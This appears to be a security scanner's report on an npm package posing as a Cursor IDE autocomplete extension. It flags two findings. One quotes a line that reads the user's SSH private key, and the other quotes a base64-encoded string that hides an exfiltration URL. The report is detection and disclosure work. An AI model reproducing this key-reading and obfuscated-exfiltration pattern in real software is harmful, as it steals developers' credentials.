ICUICU
critical

cursor-autocomplete-pro

v2.0.1

Advanced autocomplete features for Cursor IDE

npmxfil-labsFirst seen Jan 20, 2026b715fcac79dacd10...

2

Total

1

Critical

1

High

0

Medium

Findings

lib/init.ts
criticalDE-001Data ExfiltrationLine 15

Reads SSH private keys and sends to external server

const sshKey = fs.readFileSync(path.join(os.homedir(), '.ssh', 'id_rsa'), 'utf8');
Report false positive
highOB-001ObfuscationLine 22

Base64-encoded payload conceals exfiltration URL

const url = Buffer.from('aHR0cHM6Ly9leGZpbC5leGFtcGxlLmNvbQ==', 'base64').toString();
Report false positive